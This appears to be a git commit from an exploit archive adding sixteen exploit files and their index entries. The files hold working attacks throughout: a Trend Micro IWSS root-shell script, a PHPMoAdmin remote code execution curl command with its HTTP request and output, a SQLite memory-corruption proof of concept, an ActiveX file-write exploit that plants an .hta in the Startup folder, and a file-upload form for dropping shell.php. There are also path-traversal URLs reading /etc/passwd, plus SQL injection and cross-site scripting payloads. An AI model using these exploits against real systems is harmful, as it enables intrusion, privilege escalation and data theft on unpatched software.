Update: 2015-03-05

16 new exploits
2015-03-05 08:36:06 +00:00 · 2015-03-05 08:36:06 +00:00 · 5dff5f8ab5
commit 5dff5f8ab5
parent ce06069fd4
17 changed files with 436 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -32620,6 +32620,7 @@ id,file,description,date,author,platform,type,port
 36187,platforms/php/webapps/36187.txt,"WordPress Black-LetterHead Theme 1.5 'index.php' Cross Site Scripting Vulnerability",2011-09-30,SiteWatch,php,webapps,0
 36188,platforms/windows/local/36188.txt,"Electronic Arts Origin Client 9.5.5 - Multiple Privilege Escalation Vulnerabilities",2015-02-26,LiquidWorm,windows,local,0
 36189,platforms/windows/local/36189.txt,"Ubisoft Uplay 5.0 - Insecure File Permissions Local Privilege Escalation",2015-02-26,LiquidWorm,windows,local,0
 36190,platforms/linux/dos/36190.txt,"SQLite3 3.8.6 - Controlled Memory Corruption PoC",2015-02-26,"Andras Kabai",linux,dos,0
 36191,platforms/php/webapps/36191.txt,"WordPress RedLine Theme 1.65 's' Parameter Cross Site Scripting Vulnerability",2011-09-30,SiteWatch,php,webapps,0
 36192,platforms/php/webapps/36192.txt,"A2CMS 'index.php' Local File Disclosure Vulnerability",2011-09-28,St493r,php,webapps,0
 36193,platforms/php/webapps/36193.txt,"WordPress WP Bannerize 2.8.7 'ajax_sorter.php' SQL Injection Vulnerability",2011-09-30,"Miroslav Stampar",php,webapps,0
@ -32664,3 +32665,18 @@ id,file,description,date,author,platform,type,port
 36238,platforms/multiple/remote/36238.txt,"Multiple Toshiba e-Studio Devices Security Bypass Vulnerability",2011-10-17,"Deral Heiland PercX",multiple,remote,0
 36239,platforms/hardware/remote/36239.txt,"Check Point UTM-1 Edge and Safe 8.2.43 Multiple Security Vulnerabilities",2011-10-18,"Richard Brain",hardware,remote,0
 36240,platforms/php/webapps/36240.txt,"Site@School 2.4.10 'index.php' Cross Site Scripting and SQL Injection Vulnerabilities",2011-10-18,"Stefan Schurtz",php,webapps,0
 36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 'xml/get_list.php' SQL Injection Vulnerability",2011-10-19,"Yuri Goltsev",php,webapps,0
 36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 'cat' Parameter Cross Site Scripting Vulnerability",2011-10-20,"Eyup CELIK",php,webapps,0
 36246,platforms/multiple/remote/36246.txt,"Splunk <= 4.1.6 'segment' Parameter Cross Site Scripting Vulnerability",2011-10-20,"Filip Palian",multiple,remote,0
 36247,platforms/multiple/dos/36247.txt,"Splunk <= 4.1.6 Web component Remote Denial of Service Vulnerability",2011-10-20,"Filip Palian",multiple,dos,0
 36248,platforms/php/webapps/36248.txt,"osCommerce Remote File Upload and File Disclosure Vulnerabilities",2011-10-20,indoushka,php,webapps,0
 36249,platforms/php/webapps/36249.txt,"Tine 2.0 Multiple Cross Site Scripting Vulnerabilities",2011-10-20,"High-Tech Bridge SA",php,webapps,0
 36250,platforms/windows/remote/36250.html,"Oracle AutoVue 20.0.1 'AutoVueX.ocx' ActiveX Control 'ExportEdaBom()' Insecure Method Vulnerability",2011-10-24,rgod,windows,remote,0
 36251,platforms/php/webapps/36251.txt,"PHPMoAdmin Unauthorized Remote Code Execution (0-Day)",2015-03-03,@u0x,php,webapps,80
 36252,platforms/php/webapps/36252.txt,"e107 0.7.24 'cmd' Parameter Remote Command Execution Vulnerability",2011-10-24,"Matt Bergin",php,webapps,0
 36253,platforms/php/webapps/36253.txt,"InverseFlow 2.4 Multiple Cross Site Scripting Vulnerabilities",2011-10-24,"Amir Expl0its",php,webapps,0
 36254,platforms/php/webapps/36254.txt,"Alsbtain Bulletin 1.5/1.6 Multiple Local File Include Vulnerabilities",2011-10-25,"Null H4ck3r",php,webapps,0
 36255,platforms/php/webapps/36255.txt,"vtiger CRM 5.2.1 'index.php' Multiple Cross Site Scripting Vulnerabilities",2011-10-26,LiquidWorm,php,webapps,0
 36256,platforms/hardware/remote/36256.txt,"Multiple Cisco Products 'file' Parameter Directory Traversal Vulnerability",2011-10-26,"Sandro Gauci",hardware,remote,0
 36257,platforms/linux/local/36257.txt,"Trendmicro IWSS 3.1 Local Privilege Escalation Vulnerability",2011-10-26,"Buguroo Offensive Security",linux,local,0
 36258,platforms/windows/remote/36258.txt,"XAMPP 1.7.4 Multiple Cross Site Scripting Vulnerabilities",2011-10-26,Sangteamtham,windows,remote,0
--- a/platforms/hardware/remote/36256.txt
+++ b/platforms/hardware/remote/36256.txt
@ -0,0 +1,17 @@
 source: http://www.securityfocus.com/bid/50372/info
 Multiple Cisco products are prone to a directory-traversal vulnerability.
 Exploiting this issue will allow an attacker to read arbitrary files from locations outside of the application's current directory. This could help the attacker launch further attacks.
 This issue is tracked by Cisco BugID CSCts44049 and CSCth09343.
 The following products are affected:
 Cisco Unified IP Interactive Voice Response
 Cisco Unified Contact Center Express
 Cisco Unified Communications Manager 
 http://www.example.com/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd
 http://www.example.com/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../usr/local/platform/conf/platformConfig.xml 
--- a/platforms/linux/dos/36190.txt
+++ b/platforms/linux/dos/36190.txt
@ -0,0 +1,154 @@
 # Exploit Title: SQLite3 controlled memory corruption PoC (0day)
 # Date: [date]
 # Exploit Author: Andras Kabai
 # Vendor Homepage: http://www.sqlite.org/
 # Software Link: http://www.sqlite.org/download.html
 # Version: 3.8.6, 3.8.8.3
 # Tested on: Ubuntu 14.10, 64 bit 3.8.6 (latest available package), 3.8.8.3 (built from the latest source code)
 Using a crafted input (e.g. from a malicious file via “-init” parameter or directly given to the std input of the program) it is possible to trigger a memory corruption vulnerability in the most recent version of SQLite3. The memory corruption could be controlled, therefore the program flow could be manipulated by the attacker.
 The following sections demonstrates the attack against the apt-get installed installed and updated sqlite3 and against a newer version that is built from source.
 ====
 andrew@ubufuzzx6401:~/issues/sqlite$ which sqlite3
 /usr/bin/sqlite3
 andrew@ubufuzzx6401:~/issues/sqlite$ /usr/bin/sqlite3 -version
 3.8.6 2014-08-15 11:46:33 9491ba7d738528f168657adb43a198238abde19e
 andrew@ubufuzzx6401:~/issues/sqlite$ gdb64 /usr/bin/sqlite3
 GNU gdb (Ubuntu 7.8-1ubuntu4) 7.8.0.20141001-cvs
 Copyright (C) 2014 Free Software Foundation, Inc.
 License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
 This is free software: you are free to change and redistribute it.
 There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
 and "show warranty" for details.
 This GDB was configured as "x86_64-linux-gnu".
 Type "show configuration" for configuration details.
 For bug reporting instructions, please see:
 <http://www.gnu.org/software/gdb/bugs/>.
 Find the GDB manual and other documentation resources online at:
 <http://www.gnu.org/software/gdb/documentation/>.
 For help, type "help".
 Type "apropos word" to search for commands related to "word"...
 Reading symbols from /usr/bin/sqlite3...(no debugging symbols found)...done.
 (gdb) set disassembly-flavor intel
 (gdb) set args < sqlitepoc.txt
 (gdb) r
 Starting program: /usr/bin/sqlite3 < sqlitepoc.txt
 warning: the debug information found in "/lib64/ld-2.19.so" does not match "/lib64/ld-linux-x86-64.so.2" (CRC mismatch).
 [Thread debugging using libthread_db enabled]
 Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
 Usage: .trace FILE|off
 Error: near line 4: near "whatever": syntax error
 Usage: .trace FILE|off
 Program received signal SIGSEGV, Segmentation fault.
 0x00007ffff7ba06a0 in sqlite3_load_extension () from /usr/lib/x86_64-linux-gnu/libsqlite3.so.0
 (gdb) i r
 rax            0x138	312
 rbx            0x41414141424242	18367622009733698
 rcx            0x7fffffffb590	140737488336272
 rdx            0x0	0
 rsi            0x555555779b43	93824994483011
 rdi            0x41414141424242	18367622009733698
 rbp            0x555555779b43	0x555555779b43
 rsp            0x7fffffffb4c0	0x7fffffffb4c0
 r8             0x555555779b41	93824994483009
 r9             0x6c	108
 r10            0x0	0
 r11            0x0	0
 r12            0x555555779b48	93824994483016
 r13            0x7fffffffb590	140737488336272
 r14            0x555555779b40	93824994483008
 r15            0x2	2
 rip            0x7ffff7ba06a0	0x7ffff7ba06a0 <sqlite3_load_extension+736>
 eflags         0x10246	[ PF ZF IF RF ]
 cs             0x33	51
 ss             0x2b	43
 ds             0x0	0
 es             0x0	0
 fs             0x0	0
 gs             0x0	0
 (gdb) disas $rip,+10
 Dump of assembler code from 0x7ffff7ba06a0 to 0x7ffff7ba06aa:
 => 0x00007ffff7ba06a0 <sqlite3_load_extension+736>:	call   QWORD PTR [rbx+0x48]
   0x00007ffff7ba06a3 <sqlite3_load_extension+739>:	mov    r15,rax
   0x00007ffff7ba06a6 <sqlite3_load_extension+742>:	lea    rax,[rip+0x12bc1]        # 0x7ffff7bb326e
 End of assembler dump.
 ===
 andrew@ubufuzzx6401:~/tmp/build/sqlite-autoconf-3080803/.libs$ ./lt-sqlite3 -version
 3.8.8.3 2015-02-25 13:29:11 9d6c1880fb75660bbabd693175579529785f8a6b
 andrew@ubufuzzx6401:~/tmp/build/sqlite-autoconf-3080803/.libs$ gdb64 ./lt-sqlite3
 GNU gdb (Ubuntu 7.8-1ubuntu4) 7.8.0.20141001-cvs
 Copyright (C) 2014 Free Software Foundation, Inc.
 License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
 This is free software: you are free to change and redistribute it.
 There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
 and "show warranty" for details.
 This GDB was configured as "x86_64-linux-gnu".
 Type "show configuration" for configuration details.
 For bug reporting instructions, please see:
 <http://www.gnu.org/software/gdb/bugs/>.
 Find the GDB manual and other documentation resources online at:
 <http://www.gnu.org/software/gdb/documentation/>.
 For help, type "help".
 Type "apropos word" to search for commands related to "word"...
 Reading symbols from ./lt-sqlite3...done.
 (gdb) set disassembly-flavor intel
 (gdb) set args < /home/andrew/issues/sqlite/sqlitepoc.txt
 (gdb) r
 Starting program: /home/andrew/tmp/build/sqlite-autoconf-3080803/.libs/lt-sqlite3 < /home/andrew/issues/sqlite/sqlitepoc.txt
 warning: the debug information found in "/lib64/ld-2.19.so" does not match "/lib64/ld-linux-x86-64.so.2" (CRC mismatch).
 [Thread debugging using libthread_db enabled]
 Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
 Usage: .trace FILE|off
 Error: near line 4: near "whatever": syntax error
 Usage: .trace FILE|off
 Program received signal SIGSEGV, Segmentation fault.
 sqlite3LoadExtension (pzErrMsg=0x7fffffffb510, zProc=0x0, zFile=0x6261c3 "CCCCBBBBAAAA", db=0x6261c8) at sqlite3.c:36169
 36169	      }
 (gdb) i r
 rax            0x138	312
 rbx            0x41414141424242	18367622009733698
 rcx            0x7fffffffb510	140737488336144
 rdx            0x0	0
 rsi            0x6261c3	6447555
 rdi            0x41414141424242	18367622009733698
 rbp            0x6261c3	0x6261c3
 rsp            0x7fffffffb440	0x7fffffffb440
 r8             0x6261c1	6447553
 r9             0x6c	108
 r10            0x7fffffffb270	140737488335472
 r11            0x7ffff7b5ae50	140737349267024
 r12            0x6261c8	6447560
 r13            0x7fffffffb510	140737488336144
 r14            0x6261c0	6447552
 r15            0x2	2
 rip            0x7ffff7b5b130	0x7ffff7b5b130 <sqlite3_load_extension+736>
 eflags         0x10246	[ PF ZF IF RF ]
 cs             0x33	51
 ss             0x2b	43
 ds             0x0	0
 es             0x0	0
 fs             0x0	0
 gs             0x0	0
 (gdb) disas $rip,+10
 Dump of assembler code from 0x7ffff7b5b130 to 0x7ffff7b5b13a:
 => 0x00007ffff7b5b130 <sqlite3_load_extension+736>:	call   QWORD PTR [rbx+0x48]
   0x00007ffff7b5b133 <sqlite3_load_extension+739>:	mov    r15,rax
   0x00007ffff7b5b136 <sqlite3_load_extension+742>:	lea    rax,[rip+0x587d8]        # 0x7ffff7bb3915
 End of assembler dump.
 ====
 andrew@ubufuzzx6401:~/issues/sqlite$ hexdump -C sqlitepoc.txt
 00000000  3b 0a 2e 74 20 78 0a 2e  74 0a 77 68 61 74 65 76  |;..t x..t.whatev|
 00000010  65 72 00 0a 3b 0a 2e 74  0a 2e 6f 70 0a 2e 6c 20  |er..;..t..op..l |
 00000020  43 43 43 43 42 42 42 42  41 41 41 41 0a           |CCCCBBBBAAAA.|
 0000002d
--- a/platforms/linux/local/36257.txt
+++ b/platforms/linux/local/36257.txt
@ -0,0 +1,18 @@
 source: http://www.securityfocus.com/bid/50380/info
 Trendmicro IWSS is prone to a local privilege-escalation vulnerability.
 Local attackers can exploit this issue to execute arbitrary code with root privileges and completely compromise the affected computer.
 Trendmicro IWSS 3.1 is vulnerable; other versions may also be affected. 
 #!/bin/bash
 # Copyright 2011 Buguroo Offensive Security - jrvilla.AT.buguroo.com
 cd /tmp
 echo "[*] Creating shell file"
 echo -e "#!/bin/bash\n/bin/bash" > PatchExe.sh
 echo "[*] Change permissions"
 chmod 755 PatchExe.sh
 echo "[*] Got r00t... Its free!"
 /opt/trend/iwss/data/patch/bin/patchCmd u root
--- a/platforms/multiple/dos/36247.txt
+++ b/platforms/multiple/dos/36247.txt
@ -0,0 +1,10 @@
 source: http://www.securityfocus.com/bid/50298/info
 Splunk is prone to a remote denial-of-service vulnerability.
 Exploiting this issue will exhaust system resources and cause the application to crash, denying service to legitimate users. 
 http://www.example.com/en-US/prototype/segmentation_performance?lines=999&depth=99999999&segment=foo&element=span&attribute=class&segmentation=nested
 http://www.example.com/en-US/prototype/segmentation_performance?lines=99999999999999999999999999999999999999&depth=99999999999999999999999999999999999999&segment=foo&element=span&attribute=class&segmentation=nested
 https://localhost/en-US/debug/sso 
--- a/platforms/multiple/remote/36246.txt
+++ b/platforms/multiple/remote/36246.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/50296/info
 Splunk is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
 An attacker may leverage this issue to execute arbitrary HTML and script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
 Splunk versions 4.2.2 and prior are vulnerable. 
 http://www.example.com/en-US/prototype/segmentation_performance?lines=2&depth=2&segment=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&element=aaa&attribute=aaa&segmentation=flattened 
--- a/platforms/php/webapps/36244.txt
+++ b/platforms/php/webapps/36244.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/50286/info
 Boonex Dolphin is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
 A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
 Boonex Dolphin 6.1 is vulnerable; other versions may also be affected.
 http://www.example.com/xml/get_list.php?dataType=ApplyChanges&iNumb=1&iIDcat=(select 1 from AdminMenu where 1=1 group by concat((select password from Admins),rand(0)|0) having min(0) ) 
--- a/platforms/php/webapps/36245.txt
+++ b/platforms/php/webapps/36245.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/50295/info
 Innovate Portal is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
 An attacker may leverage this issue to execute arbitrary HTML and script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
 http://www.example.com/index.php?cat=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28948044%29%3c%2fScRiPt%3e&content=error&sid=57cdbb83e0ab1b879e0a0f91fbf22781&what=user_notfound 
--- a/platforms/php/webapps/36248.txt
+++ b/platforms/php/webapps/36248.txt
@ -0,0 +1,13 @@
 source: http://www.securityfocus.com/bid/50301/info
 osCommerce is prone to a remote file upload and a file disclosure vulnerability. The issues occur because the application fails to adequately sanitize user-supplied input.
 An attacker can exploit these issues to upload a file and obtain an arbitrary file's content; other attacks are also possible. 
 The following URL is available for the file disclosure vulnerability:
 http://www.example.com/admin/shop_file_manager.php/login.php/login.php?action=download&filename=/includes/_includes_configure.php
 The following exploit is available for the remote file upload vulnerability: 
 <html><head><title> creloaded - Remote File Upload </title></head> <br><br><u>UPLOAD FILE:</u><br> <form name="file" action="https://www.example.com/admin/shop_file_manager.php/login.php?action=processuploads" method="post" enctype="multipart/form-data"> <input type="file" name="file_1"><br> <input name="submit" type="submit" value=" Upload " > </form> <br><u>CREATE FILE:</u><br> <form name="new_file" action="https://www.example.com/admin/shop_file_manager.php/login.php?action=save" method="post"> FILE NAME:<br> <input type="text" name="filename">&nbsp; (ex. shell.php)<br>FILE CONTENTS:<br> <textarea name="file_contents" wrap="soft" cols="70" rows="10">&lt;/textarea&gt; <input name="submit" type="submit" value=" Save " > </form> 
--- a/platforms/php/webapps/36249.txt
+++ b/platforms/php/webapps/36249.txt
@ -0,0 +1,13 @@
 source: http://www.securityfocus.com/bid/50307/info
 Tine is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
 An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
 Tine 2.0 is vulnerable; other versions may also be affected. 
 http://www.example.com/library/idnaconvert/example.php?lang=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
 http://www.example.com/library/idnaconvert/example.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
 http://www.example.com/library/phpexcel/phpexcel/shared/jama/docs/download.php/%27%3E%3Cscript%3Ealert%28document.cooki e%29;%3C/script%3E
--- a/platforms/php/webapps/36251.txt
+++ b/platforms/php/webapps/36251.txt
@ -0,0 +1,87 @@
 ######################################################################
 #  _     ___  _   _  ____  ____    _  _____
 #  | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
 #  | |  | | | |  \| | |  _| |     / _ \ | |
 #  | |__| |_| | |\  | |_| | |___ / ___ \| |
 #  |_____\___/|_| \_|\____|\____/_/   \_\_|
 #
 # PHPMoAdmin Unauthorized Remote Code Execution (0-Day)
 # Website : http://www.phpmoadmin.com/
 # Exploit Author : @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio
 # Release dates : March 3, 2015
 #
 # Special Thanks to 2600 Thailand group
 # https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
 #
 ########################################################################
 [+] Description
 ============================================================
 PHPMoAdmin is a MongoDB administration tool for PHP built on a
 stripped-down version of the Vork high-performance framework.
 [+] Exploit
 ============================================================
 Someone was trying to sale this shit for 3000usd lolz
 $ curl "http://path.to/moadmin.php" -d "object=1;system('id');exit"
 [+] Proof-of-Concept
 ============================================================
 PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7
 POST /moadmin/moadmin.php HTTP/1.1
 Host: 192.168.33.10
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0)
 Gecko/20100101 Firefox/36.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 DNT: 1
 Connection: keep-alive
 Pragma: no-cache
 Cache-Control: no-cache
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 34
 object=1;system('id;ls -lha');exit
 HTTP/1.1 200 OK
 Date: Tue, 03 Mar 2015 16:57:40 GMT
 Server: Apache/2.4.7 (Ubuntu)
 Set-Cookie: PHPSESSID=m0ap55aonsj5ueph7hgku0elb1; path=/
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
 pre-check=0
 Pragma: no-cache
 Vary: Accept-Encoding
 Content-Length: 223
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Content-Type: text/html
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 total 116K
 drwxr-xr-x 1 longcat longcat  102 Mar  3 16:55 .
 drwxr-xr-x 6 root    root    4.0K Mar  3 16:17 ..
 -rw-rw-r-- 1 longcat longcat 112K Mar  3 16:55 moadmin.php
 [+] Vulnerability Analysis
 ============================================================
 Filename: moadmin.php
 1. create new moadminComponent object
 1977: $mo = new moadminComponent;
 2. if the http-post parameter 'object' is set
 738: class moadminComponent {
 ...
 762: public function __construct() {
 ...
 786: if (isset($_POST['object'])) {
 787:    if (self::$model->saveObject($_GET['collection'],
 $_POST['object'])) {
 ...
 3. evaluate the value of 'object' as PHP code
 692: public function saveObject($collection, $obj) {
 693:    eval('$obj=' . $obj . ';'); //cast from string to array
--- a/platforms/php/webapps/36252.txt
+++ b/platforms/php/webapps/36252.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/50339/info
 e107 is prone to a remote command-execution vulnerability because it fails to properly validate user-supplied input.
 An attacker can exploit this issue to execute arbitrary commands within the context of the vulnerable application.
 e107 0.7.24 is vulnerable; other versions may also be affected. 
 http://www.example.com/e107_config.php?cmd=id 
--- a/platforms/php/webapps/36253.txt
+++ b/platforms/php/webapps/36253.txt
@ -0,0 +1,13 @@
 source: http://www.securityfocus.com/bid/50344/info
 InverseFlow is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
 An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
 InverseFlow 2.4 is vulnerable; other versions may also be affected. 
 http://www.example.com/inver/inverseflow/ticketview.php?email= [XSS]
 http://www.example.com/inver/inverseflow/ticketview.php?email=&id=[XSS]
 http://www.example.com/inver/inverseflow/login.php?redirect=[XSS] 
--- a/platforms/php/webapps/36254.txt
+++ b/platforms/php/webapps/36254.txt
@ -0,0 +1,10 @@
 source: http://www.securityfocus.com/bid/50350/info
 Alsbtain Bulletin is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
 An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
 Alsbtain Bulletin 1.5 and 1.6 are vulnerable; other versions may also be affected. 
 http://www.example.com/index.php?style=[LFI]%00
 http://www.example.com/index.php?act=[LFI]%00 
--- a/platforms/php/webapps/36255.txt
+++ b/platforms/php/webapps/36255.txt
@ -0,0 +1,10 @@
 source: http://www.securityfocus.com/bid/50364/info
 vtiger CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 vtiger CRM 5.2.1 is vulnerable; other versions may also be affected. 
 http://www.example.com/modules/mobile/index.php?_operation="><script>alert(1)</script>
 http://www.example.com/modules/mobile/index.php?_operation=listModuleRecords&module=Services&search="><script>alert(1)</script>
--- a/platforms/windows/remote/36250.html
+++ b/platforms/windows/remote/36250.html
@ -0,0 +1,31 @@
 source: http://www.securityfocus.com/bid/50332/info
 Oracle AutoVue 'AutoVueX.ocx' ActiveX control is prone to a vulnerability caused by an insecure method.
 Successfully exploiting this issue will allow attackers to create or overwrite arbitrary files on a victim's computer within the context of the affected application (typically Internet Explorer) that uses the ActiveX control.
 Oracle AutoVue 20.0.1 is vulnerable; other versions may also be affected. 
 <!--
 Oracle AutoVue AutoVueX ActiveX Control ExportEdaBom Remote Code Execution 
 ProgID: AUTOVUEX.AutoVueXCtrl.1
 CLSID: {B6FCC215-D303-11D1-BC6C-0000C078797F}
 Binary path: C:\PROGRA~1\av\avwin\AutoVueX.ocx
 Safe for initialization (registry): true
 Safe for scripting (registry): true
 rgod
 -->
 <!-- saved from url=(0014)about:internet --> 
 <html>
 <object classid='clsid:B6FCC215-D303-11D1-BC6C-0000C078797F' id='obj' width=640 & height=480 />
 <param name=SRC value="PADS_Evaluation_board.pcb"></param>
 </object>
 <script defer="defer">
 var sh = "<" + "SCRIPT> var x=new ActiveXObject(\"WScript.Shell\"); x.Exec(\"CALC.EXE\"); <" +"/SCRIPT>";
 for (i=0; i<6666; i++) { 
    obj.ExportEdaBom("../../../../../../../../../../../Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\sh.hta","aaaa",true,sh);
 }
 window.location.href = window.location.href;
 </script>
--- a/platforms/windows/remote/36258.txt
+++ b/platforms/windows/remote/36258.txt
@ -0,0 +1,10 @@
 source: http://www.securityfocus.com/bid/50381/info
 XAMPP is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
 An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 These issues affect XAMPP 1.7.4 for Windows and prior. 
 http://www.example.com/xampp/ming.php?text=[xss]
 http://www.example.com/xampp/cds.php/[xss]